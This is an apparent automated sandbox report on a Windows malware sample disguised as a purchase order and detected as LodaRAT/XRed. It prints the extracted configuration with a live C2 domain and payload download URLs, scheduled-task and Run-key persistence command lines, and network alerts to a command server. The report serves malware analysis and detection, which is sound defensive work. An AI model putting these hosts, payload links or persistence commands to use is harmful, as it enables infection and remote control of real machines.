Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Purchase-Order.exe

Overview

General Information

Sample name:Purchase-Order.exe
Analysis ID:1582343
MD5:63a057389438a0b287d32e31149d6ad4
SHA1:f2114dea9d348008317751d413bdf5d4fc047513
SHA256:1150fc6830ed3e383726e18b447d840f62f74b30d072291762a70d6c7600cb45
Tags:exeknkbkk212user-JAMESWT_MHT
Infos:

Detection

LodaRAT, XRed
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Icon mismatch, binary includes an icon from a different legit application in order to fool users
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LodaRAT
Yara detected XRed
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Document contains an embedded VBA macro with suspicious strings
Document contains an embedded VBA with functions possibly related to ADO stream file operations
Document contains an embedded VBA with functions possibly related to HTTP operations
Document contains an embedded VBA with functions possibly related to WSH operations (process, registry, environment, or keystrokes)
Drops PE files to the document folder of the user
Initial sample is a PE file and has a suspicious name
Machine Learning detection for dropped file
Machine Learning detection for sample
Sigma detected: Potentially Suspicious Malware Callback Communication
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: WScript or CScript Dropper
Uses dynamic DNS services
Uses schtasks.exe or at.exe to add and modify task schedules
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops files with a non-matching file extension (content does not match file extension)
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May infect USB drives
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
OS version to string mapping found (often used in BOTs)
PE file contains executable resources (Code or Archives)
Potential key logger detected (key state polling based)
Queries the installation date of Windows
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Schtasks From Env Var Folder
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification
Sleep loop found (likely to delay execution)
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara detected ProcessChecker

Classification

  • System is w10x64
  • Purchase-Order.exe (PID: 6664 cmdline: "C:\Users\user\Desktop\Purchase-Order.exe" MD5: 63A057389438A0B287D32E31149D6AD4)
    • ._cache_Purchase-Order.exe (PID: 6808 cmdline: "C:\Users\user\Desktop\._cache_Purchase-Order.exe" MD5: 5C99BB8A6972F6FCE154D00AA56F2F9D)
      • cmd.exe (PID: 5808 cmdline: C:\Windows\system32\cmd.exe /c schtasks /create /tn LMDNDG.exe /tr C:\Users\user\AppData\Roaming\Windata\OJTLMJ.exe /sc minute /mo 1 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 772 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • schtasks.exe (PID: 5468 cmdline: schtasks /create /tn LMDNDG.exe /tr C:\Users\user\AppData\Roaming\Windata\OJTLMJ.exe /sc minute /mo 1 MD5: 48C2FE20575769DE916F48EF0676A965)
      • wscript.exe (PID: 3228 cmdline: WSCript C:\Users\user\AppData\Local\Temp\LMDNDG.vbs MD5: FF00E0480075B095948000BDC66E81F0)
    • Synaptics.exe (PID: 6908 cmdline: "C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate MD5: ACA4D70521DE30563F4F2501D4D686A5)
  • EXCEL.EXE (PID: 7020 cmdline: "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding MD5: 4A871771235598812032C822E6F68F19)
    • splwow64.exe (PID: 1436 cmdline: C:\Windows\splwow64.exe 12288 MD5: 77DE7761B037061C7C112FD3C5B91E73)
  • OJTLMJ.exe (PID: 3196 cmdline: C:\Users\user\AppData\Roaming\Windata\OJTLMJ.exe MD5: 5C99BB8A6972F6FCE154D00AA56F2F9D)
  • OJTLMJ.exe (PID: 7500 cmdline: "C:\Users\user\AppData\Roaming\Windata\OJTLMJ.exe" MD5: 5C99BB8A6972F6FCE154D00AA56F2F9D)
  • OJTLMJ.exe (PID: 7676 cmdline: C:\Users\user\AppData\Roaming\Windata\OJTLMJ.exe MD5: 5C99BB8A6972F6FCE154D00AA56F2F9D)
  • Synaptics.exe (PID: 8036 cmdline: "C:\ProgramData\Synaptics\Synaptics.exe" MD5: ACA4D70521DE30563F4F2501D4D686A5)
  • OJTLMJ.exe (PID: 7532 cmdline: "C:\Users\user\AppData\Roaming\Windata\OJTLMJ.exe" MD5: 5C99BB8A6972F6FCE154D00AA56F2F9D)
  • OJTLMJ.exe (PID: 6980 cmdline: "C:\Users\user\AppData\Roaming\Windata\OJTLMJ.exe" MD5: 5C99BB8A6972F6FCE154D00AA56F2F9D)
  • OJTLMJ.exe (PID: 9204 cmdline: C:\Users\user\AppData\Roaming\Windata\OJTLMJ.exe MD5: 5C99BB8A6972F6FCE154D00AA56F2F9D)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Loda, LodaRATLoda is a previously undocumented AutoIT malware with a variety of capabilities for spying on victims. Proofpoint first observed Loda in September of 2016 and it has since grown in popularity. The name Loda is derived from a directory to which the malware author chose to write keylogger logs. It should be noted that some antivirus products currently detect Loda as Trojan.Nymeria, although the connection is not well-documented.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.loda
{"C2 url": "xred.mooo.com", "Email": "xredline1@gmail.com", "Payload urls": ["http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978", "https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download", "https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=1", "http://xred.site50.net/syn/SUpdate.ini", "https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download", "https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1", "http://xred.site50.net/syn/Synaptics.rar", "https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=download", "https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1", "http://xred.site50.net/syn/SSLLibrary.dll"]}
SourceRuleDescriptionAuthorStrings
Purchase-Order.exeJoeSecurity_XRedYara detected XRedJoe Security
    Purchase-Order.exeJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
      SourceRuleDescriptionAuthorStrings
      dump.pcapJoeSecurity_LodaRat_1Yara detected LodaRATJoe Security
        SourceRuleDescriptionAuthorStrings
        C:\Users\user\AppData\Local\Temp\LMDNDG.vbsJoeSecurity_ProcessCheckerYara detected ProcessCheckerJoe Security
          C:\Users\user\Documents\~$cache1JoeSecurity_XRedYara detected XRedJoe Security
            C:\Users\user\Documents\~$cache1JoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
              C:\ProgramData\Synaptics\RCX600B.tmpJoeSecurity_XRedYara detected XRedJoe Security
                C:\ProgramData\Synaptics\RCX600B.tmpJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
                  Click to see the 2 entries
                  SourceRuleDescriptionAuthorStrings
                  00000000.00000000.1695406203.0000000000401000.00000020.00000001.01000000.00000003.sdmpJoeSecurity_XRedYara detected XRedJoe Security
                    00000000.00000000.1695406203.0000000000401000.00000020.00000001.01000000.00000003.sdmpJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
                      00000002.00000003.1779135345.00000000005DC000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_XRedYara detected XRedJoe Security
                        Process Memory Space: Purchase-Order.exe PID: 6664JoeSecurity_XRedYara detected XRedJoe Security
                          Process Memory Space: Synaptics.exe PID: 6908JoeSecurity_XRedYara detected XRedJoe Security
                            SourceRuleDescriptionAuthorStrings
                            0.0.Purchase-Order.exe.400000.0.unpackJoeSecurity_XRedYara detected XRedJoe Security
                              0.0.Purchase-Order.exe.400000.0.unpackJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security

                                System Summary

                                barindex
                                Source: Network ConnectionAuthor: Florian Roth (Nextron Systems): Data: DestinationIp: 172.111.138.100, DestinationIsIpv6: false, DestinationPort: 5552, EventID: 3, Image: C:\Users\user\Desktop\._cache_Purchase-Order.exe, Initiated: true, ProcessId: 6808, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49758
                                Source: Process startedAuthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: WSCript C:\Users\user\AppData\Local\Temp\LMDNDG.vbs, CommandLine: WSCript C:\Users\user\AppData\Local\Temp\LMDNDG.vbs, CommandLine|base64offset|contains: Y , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\._cache_Purchase-Order.exe" , ParentImage: C:\Users\user\Desktop\._cache_Purchase-Order.exe, ParentProcessId: 6808, ParentProcessName: ._cache_Purchase-Order.exe, ProcessCommandLine: WSCript C:\Users\user\AppData\Local\Temp\LMDNDG.vbs, ProcessId: 3228, ProcessName: wscript.exe
                                Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: WSCript C:\Users\user\AppData\Local\Temp\LMDNDG.vbs, CommandLine: WSCript C:\Users\user\AppData\Local\Temp\LMDNDG.vbs, CommandLine|base64offset|contains: Y , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\._cache_Purchase-Order.exe" , ParentImage: C:\Users\user\Desktop\._cache_Purchase-Order.exe, ParentProcessId: 6808, ParentProcessName: ._cache_Purchase-Order.exe, ProcessCommandLine: WSCript C:\Users\user\AppData\Local\Temp\LMDNDG.vbs, ProcessId: 3228, ProcessName: wscript.exe
                                Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: WSCript C:\Users\user\AppData\Local\Temp\LMDNDG.vbs, CommandLine: WSCript C:\Users\user\AppData\Local\Temp\LMDNDG.vbs, CommandLine|base64offset|contains: Y , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\._cache_Purchase-Order.exe" , ParentImage: C:\Users\user\Desktop\._cache_Purchase-Order.exe, ParentProcessId: 6808, ParentProcessName: ._cache_Purchase-Order.exe, ProcessCommandLine: WSCript C:\Users\user\AppData\Local\Temp\LMDNDG.vbs, ProcessId: 3228, ProcessName: wscript.exe
                                Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: "C:\Users\user\AppData\Roaming\Windata\OJTLMJ.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\._cache_Purchase-Order.exe, ProcessId: 6808, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\LMDNDG
                                Source: File createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\Desktop\._cache_Purchase-Order.exe, ProcessId: 6808, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LMDNDG.lnk
                                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: schtasks /create /tn LMDNDG.exe /tr C:\Users\user\AppData\Roaming\Windata\OJTLMJ.exe /sc minute /mo 1, CommandLine: schtasks /create /tn LMDNDG.exe /tr C:\Users\user\AppData\Roaming\Windata\OJTLMJ.exe /sc minute /mo 1, CommandLine|base64offset|contains: mj,, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c schtasks /create /tn LMDNDG.exe /tr C:\Users\user\AppData\Roaming\Windata\OJTLMJ.exe /sc minute /mo 1, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 5808, ParentProcessName: cmd.exe, ProcessCommandLine: schtasks /create /tn LMDNDG.exe /tr C:\Users\user\AppData\Roaming\Windata\OJTLMJ.exe /sc minute /mo 1, ProcessId: 5468, ProcessName: schtasks.exe
                                Source: Process startedAuthor: Michael Haag: Data: Command: WSCript C:\Users\user\AppData\Local\Temp\LMDNDG.vbs, CommandLine: WSCript C:\Users\user\AppData\Local\Temp\LMDNDG.vbs, CommandLine|base64offset|contains: Y , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\._cache_Purchase-Order.exe" , ParentImage: C:\Users\user\Desktop\._cache_Purchase-Order.exe, ParentProcessId: 6808, ParentProcessName: ._cache_Purchase-Order.exe, ProcessCommandLine: WSCript C:\Users\user\AppData\Local\Temp\LMDNDG.vbs, ProcessId: 3228, ProcessName: wscript.exe
                                Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\ProgramData\Synaptics\Synaptics.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\Purchase-Order.exe, ProcessId: 6664, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Synaptics Pointing Device Driver
                                Source: File createdAuthor: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\ProgramData\Synaptics\Synaptics.exe, ProcessId: 6908, TargetFilename: C:\Users\user\AppData\Local\Temp\PNFX2U4z.xlsm
                                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                2024-12-30T11:35:55.334396+010020448871A Network Trojan was detected192.168.2.449735142.250.186.142443TCP
                                2024-12-30T11:35:55.369145+010020448871A Network Trojan was detected192.168.2.449736142.250.186.142443TCP
                                2024-12-30T11:35:56.333740+010020448871A Network Trojan was detected192.168.2.449740142.250.186.142443TCP
                                2024-12-30T11:35:56.462028+010020448871A Network Trojan was detected192.168.2.449743142.250.186.142443TCP
                                2024-12-30T11:35:57.375990+010020448871A Network Trojan was detected192.168.2.449746142.250.186.142443TCP
                                2024-12-30T11:35:57.447128+010020448871A Network Trojan was detected192.168.2.449749142.250.186.142443TCP
                                2024-12-30T11:35:58.365272+010020448871A Network Trojan was detected192.168.2.449753142.250.186.142443TCP
                                2024-12-30T11:35:58.419082+010020448871A Network Trojan was detected192.168.2.449755142.250.186.142443TCP
                                2024-12-30T11:35:59.054389+010020448871A Network Trojan was detected192.168.2.449763142.250.186.142443TCP
                                2024-12-30T11:35:59.054597+010020448871A Network Trojan was detected192.168.2.449762142.250.186.142443TCP
                                2024-12-30T11:36:00.028678+010020448871A Network Trojan was detected192.168.2.449767142.250.186.142443TCP
                                2024-12-30T11:36:00.040252+010020448871A Network Trojan was detected192.168.2.449766142.250.186.142443TCP
                                2024-12-30T11:36:01.021011+010020448871A Network Trojan was detected192.168.2.449774142.250.186.142443TCP
                                2024-12-30T11:36:01.033440+010020448871A Network Trojan was detected192.168.2.449772142.250.186.142443TCP
                                2024-12-30T11:36:02.033273+010020448871A Network Trojan was detected192.168.2.449777142.250.186.142443TCP
                                2024-12-30T11:36:02.033283+010020448871A Network Trojan was detected192.168.2.449776142.250.186.142443TCP
                                2024-12-30T11:36:03.021610+010020448871A Network Trojan was detected192.168.2.449781142.250.186.142443TCP
                                2024-12-30T11:36:03.021633+010020448871A Network Trojan was detected192.168.2.449782142.250.186.142443TCP
                                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                2024-12-30T11:35:57.671734+010028221161Malware Command and Control Activity Detected192.168.2.449758172.111.138.1005552TCP
                                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                2024-12-30T11:36:50.131980+010028309121Malware Command and Control Activity Detected172.111.138.1005552192.168.2.449758TCP
                                2024-12-30T11:37:25.462798+010028309121Malware Command and Control Activity Detected172.111.138.1005552192.168.2.449758TCP
                                2024-12-30T11:38:03.509389+010028309121Malware Command and Control Activity Detected172.111.138.1005552192.168.2.449758TCP
                                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                2024-12-30T11:35:55.836952+010028326171Malware Command and Control Activity Detected192.168.2.44973969.42.215.25280TCP
                                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                2024-12-30T11:35:48.082414+010028498851Malware Command and Control Activity Detected192.168.2.449758172.111.138.1005552TCP
                                2024-12-30T11:35:57.671734+010028498851Malware Command and Control Activity Detected192.168.2.449758172.111.138.1005552TCP

                                Click to jump to signature section

                                Show All Signature Results

                                AV Detection

                                barindex
                                Source: Purchase-Order.exeAvira: detected
                                Source: Purchase-Order.exeAvira: detected
                                Source: Purchase-Order.exeAvira: detected
                                Source: http://xred.site50.net/syn/Synaptics.rarXAvira URL Cloud: Label: malware
                                Source: http://xred.site50.net/syn/SSLLibrary.dl4Avira URL Cloud: Label: malware
                                Source: C:\Users\user\Desktop\._cache_Purchase-Order.exeAvira: detection malicious, Label: HEUR/AGEN.1353217
                                Source: C:\Users\user\Documents\~$cache1Avira: detection malicious, Label: TR/Dldr.Agent.SH
                                Source: C:\Users\user\Documents\~$cache1Avira: detection malicious, Label: W2000M/Dldr.Agent.17651006
                                Source: C:\ProgramData\Synaptics\RCX600B.tmpAvira: detection malicious, Label: TR/Dldr.Agent.SH
                                Source: C:\ProgramData\Synaptics\RCX600B.tmpAvira: detection malicious, Label: W2000M/Dldr.Agent.17651006
                                Source: C:\Users\user\AppData\Roaming\Windata\OJTLMJ.exeAvira: detection malicious, Label: HEUR/AGEN.1353217
                                Source: C:\ProgramData\Synaptics\Synaptics.exeAvira: detection malicious, Label: TR/Dldr.Agent.SH
                                Source: C:\ProgramData\Synaptics\Synaptics.exeAvira: detection malicious, Label: HEUR/AGEN.1353217
                                Source: C:\ProgramData\Synaptics\Synaptics.exeAvira: detection malicious, Label: W2000M/Dldr.Agent.17651006
                                Source: C:\Users\user\AppData\Local\Temp\LMDNDG.vbsAvira: detection malicious, Label: VBS/Runner.VPJI
                                Source: Purchase-Order.exeMalware Configuration Extractor: XRed {"C2 url": "xred.mooo.com", "Email": "xredline1@gmail.com", "Payload urls": ["http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978", "https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download", "https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=1", "http://xred.site50.net/syn/SUpdate.ini", "https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download", "https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1", "http://xred.site50.net/syn/Synaptics.rar", "https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=download", "https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1", "http://xred.site50.net/syn/SSLLibrary.dll"]}
                                Source: C:\ProgramData\Synaptics\RCX600B.tmpReversingLabs: Detection: 91%
                                Source: C:\ProgramData\Synaptics\Synaptics.exeReversingLabs: Detection: 92%
                                Source: C:\Users\user\AppData\Roaming\Windata\OJTLMJ.exeReversingLabs: Detection: 57%
                                Source: C:\Users\user\Desktop\._cache_Purchase-Order.exeReversingLabs: Detection: 57%
                                Source: C:\Users\user\Documents\~$cache1ReversingLabs: Detection: 91%
                                Source: Purchase-Order.exeVirustotal: Detection: 86%Perma Link
                                Source: Purchase-Order.exeReversingLabs: Detection: 92%
                                Source: Submited SampleIntegrated Neural Analysis Model: Matched 91.7% probability
                                Source: C:\Users\user\Desktop\._cache_Purchase-Order.exeJoe Sandbox ML: detected
                                Source: C:\Users\user\Documents\~$cache1Joe Sandbox ML: detected
                                Source: C:\ProgramData\Synaptics\RCX600B.tmpJoe Sandbox ML: detected
                                Source: C:\Users\user\AppData\Roaming\Windata\OJTLMJ.exeJoe Sandbox ML: detected
                                Source: C:\ProgramData\Synaptics\Synaptics.exeJoe Sandbox ML: detected
                                Source: Purchase-Order.exeJoe Sandbox ML: detected
                                Source: Purchase-Order.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile opened: C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\MSVCR100.dllJump to behavior
                                Source: unknownHTTPS traffic detected: 142.250.186.142:443 -> 192.168.2.4:49735 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.142:443 -> 192.168.2.4:49736 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.142:443 -> 192.168.2.4:49740 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.97:443 -> 192.168.2.4:49741 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.142:443 -> 192.168.2.4:49743 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.97:443 -> 192.168.2.4:49742 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.142:443 -> 192.168.2.4:49746 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.142:443 -> 192.168.2.4:49749 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.142:443 -> 192.168.2.4:49753 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.142:443 -> 192.168.2.4:49755 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.142:443 -> 192.168.2.4:49762 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.142:443 -> 192.168.2.4:49763 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.97:443 -> 192.168.2.4:49771 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.142:443 -> 192.168.2.4:49774 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.142:443 -> 192.168.2.4:49772 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.97:443 -> 192.168.2.4:49773 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.142:443 -> 192.168.2.4:49781 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.142:443 -> 192.168.2.4:49782 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.142:443 -> 192.168.2.4:49796 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.142:443 -> 192.168.2.4:49797 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.142:443 -> 192.168.2.4:49815 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.142:443 -> 192.168.2.4:49817 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.142:443 -> 192.168.2.4:49821 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.142:443 -> 192.168.2.4:49824 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.97:443 -> 192.168.2.4:49830 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.142:443 -> 192.168.2.4:49829 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.142:443 -> 192.168.2.4:49833 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.97:443 -> 192.168.2.4:49832 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.142:443 -> 192.168.2.4:49842 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.142:443 -> 192.168.2.4:49845 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.97:443 -> 192.168.2.4:49850 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.97:443 -> 192.168.2.4:49852 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.142:443 -> 192.168.2.4:49857 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.142:443 -> 192.168.2.4:49858 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.142:443 -> 192.168.2.4:49871 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.142:443 -> 192.168.2.4:49872 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.142:443 -> 192.168.2.4:49878 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.142:443 -> 192.168.2.4:49879 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.142:443 -> 192.168.2.4:49883 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.142:443 -> 192.168.2.4:49884 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.97:443 -> 192.168.2.4:49885 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.97:443 -> 192.168.2.4:49886 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.142:443 -> 192.168.2.4:49898 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.142:443 -> 192.168.2.4:49899 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.142:443 -> 192.168.2.4:49908 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.142:443 -> 192.168.2.4:49906 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.142:443 -> 192.168.2.4:49910 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.142:443 -> 192.168.2.4:49911 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.142:443 -> 192.168.2.4:49915 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.142:443 -> 192.168.2.4:49917 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.142:443 -> 192.168.2.4:49921 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.142:443 -> 192.168.2.4:49923 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.97:443 -> 192.168.2.4:49928 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.97:443 -> 192.168.2.4:49930 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.142:443 -> 192.168.2.4:49932 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.142:443 -> 192.168.2.4:49936 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.142:443 -> 192.168.2.4:49938 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.142:443 -> 192.168.2.4:49939 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.142:443 -> 192.168.2.4:49943 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.142:443 -> 192.168.2.4:49945 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.142:443 -> 192.168.2.4:49949 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.142:443 -> 192.168.2.4:49948 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.142:443 -> 192.168.2.4:49953 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.186.142:443 -> 192.168.2.4:49954 version: TLS 1.2
